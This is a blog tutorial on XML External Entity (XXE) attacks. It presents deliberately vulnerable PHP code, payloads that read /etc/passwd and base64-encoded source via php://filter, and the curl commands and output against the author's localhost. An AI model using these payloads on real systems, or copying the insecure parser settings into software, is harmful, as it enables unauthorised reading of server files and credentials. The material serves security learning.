Wednesday, October 2, 2019

Reading local files with XXE attacks

Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with XML as its input.

This is our vulnerable php code:

xml.php 
<?php 
    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    echo "You have logged in as user $user";
?>

Our goal here is to include a malicious xml file with the data definitions set so that we can read local files on the server. This is our XML file we will POST to the application. If everything goes well the document will return the contents of /etc/passwd.

users.xml 
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

We can post this file to the application using the cURL utility. 

root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php 
You have logged in as user root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:108::/var/run/dbus:/bin/false
syslog:x:105:109::/home/syslog:/bin/false
_apt:x:106:65534::/nonexistent:/bin/false
ntp:x:107:113::/home/ntp:/bin/false
avahi-autoipd:x:108:114:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:109:115:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
colord:x:110:118:colord colour management daemon,,,:/var/lib/colord:/bin/false
dnsmasq:x:111:65534:dnsmasq,,,:/var/lib/misc:/bin/false
pulse:x:112:119:PulseAudio daemon,,,:/var/run/pulse:/bin/false
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
rtkit:x:114:121:RealtimeKit,,,:/proc:/bin/false
saned:x:115:122::/var/lib/saned:/bin/false
usbmux:x:116:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
speech-dispatcher:x:117:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
uuidd:x:118:123::/run/uuidd:/bin/false
sam:x:1000:1000:sam,,,:/home/sam:/bin/bash
statd:x:119:65534::/var/lib/nfs:/bin/false
mysql:x:120:127:MySQL Server,,,:/nonexistent:/bin/false
openldap:x:121:128:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
test:x:1001:1001:test test,333,555-444-3212,:/home/test:/bin/bash
snmp:x:122:129::/var/lib/snmp:/usr/sbin/nologin
clare:x:1002:1002:clare chapman,100,555-222-1234,:/home/clare:/bin/bash
vance:x:1003:1003:vance perkins,101,,:/home/vance:/bin/bash
sasha:x:1004:1004:sasha kim,102,,:/home/sasha:/bin/bash
hayden:x:1005:1005:hayden sutton,103,,:/home/hayden:/bin/bash
jared:x:1006:1006:jared beck,104,,:/home/jared:/bin/bash
dovecot:x:124:132:Dovecot mail server,,,:/usr/lib/dovecot:/bin/false
dovenull:x:125:133:Dovecot login user,,,:/nonexistent:/bin/false
bind:x:126:134::/var/cache/bind:/bin/false
ftp:x:127:135:ftp daemon,,,:/srv/ftp:/bin/false
sshd:x:128:65534::/var/run/sshd:/usr/sbin/nologin
user434:x:1007:1007:,,,:/home/user434:/bin/bash
postfix:x:123:130::/var/spool/postfix:/bin/false
muser342:x:1008:1008:,,,:/home/muser342:/bin/bash
muser455:x:1009:1009:,,,:/home/muser455:/bin/bash
muser123:x:1010:1010:,,,:/home/muser123:/bin/bash
muser324:x:1011:1011:,,,:/home/muser324:/bin/bash
muser223:x:1012:1012:,,,:/home/muser223:/bin/bash
root@asus:~/public_html%

As you can see we successfully included the tainted XML file and POST'd it to the server which gave us the contents of the /etc/passwd file.

Using PHP Filters with XXE

You can also use PHP Filters to include local and remote files on the server through the base64 filter. This way we can read the source code of the files on the webserver. 

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=info.php" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

If we load up our request in cURL and submit the POST we should get the source of the info.php file base64 encoded. 

root@asus:~/public_html% curl -d @users.xml http://localhost/~sam/xml.php 
You have logged in as user PD9waHAgcGhwaW5mbygpOz8+Cg==
root@asus:~/public_html%

if we decode the string from our request we get. 

root@asus:~/public_html% echo PD9waHAgcGhwaW5mbygpOz8+Cg== | base64 -d
<?php phpinfo();?>
root@asus:~/public_html%
at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Exploiting Weak WEBDAV Configurations

The server we are going to audit has the following fingerprint. 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) Next we need t...

  • Enumerating SNMP Servers with NMAP
    NMAP gives you the ability to use scripts to enumerate and exploit remote host with the use of the NMAP Scripting Engine. Today we will be ...
  • Enumerating SMTP Servers with NMAP
    NMAP gives you the ability to enumerate SMTP service with some scripts from the NMAP Scripting Enigne. These scripts will produce some gene...
  • Testing LDAP servers with examples
    Today we are going to be attacking the remote service LDAP. The only thing we need is an IP Address so lets ping our host to verify its up ...
  • Exploring POP3 Servers
    Scanning the remote host We can use NMAP to scan the remote host and run enumeration scripts against the POP3 server. root@asus:~/unix% ...
  • Reading local files with XXE attacks
    Today we will be exploring XXE XML External Entity Attacks. A XXE attack is a attack that is brought against an application that deals with...
  • bWAPP Remote & Local File Inclusion (RFI/LFI)
    In bWAPP There is a module for RFI and LFI injections. Our goal is to exploit these vulnerabilities and get local access to the remote mac...
  • Socat Encrypted Bind and Reverse shells
    Encrypted Bind Shell First we need to generate a new openssl key to use with our bind shell. Victim Box: user@debian:~$ openssl req -ne...
  • DVWA: SQL Injection (Blind) with sqlmap
    We start off by getting the database names hosted on the remote server. sam@ubuntu:~/pentest/sqlmap$ python sqlmap.py -u "http://192...
  • Exploring NTP servers
    The ntpupdate command is used for updating your system time from a remote NTP server root@asus:~/unix% ntpdate -d 48.21.33.124 24 Sep 11:...
  • Metasploitable II: Samba Shares
    Lets first start off with an nmap scan of the remote host. root@ubuntu:~# nmap -p 139,445 -sV -sC 192.168.56.101 Starting Nmap 7.60 ( ht...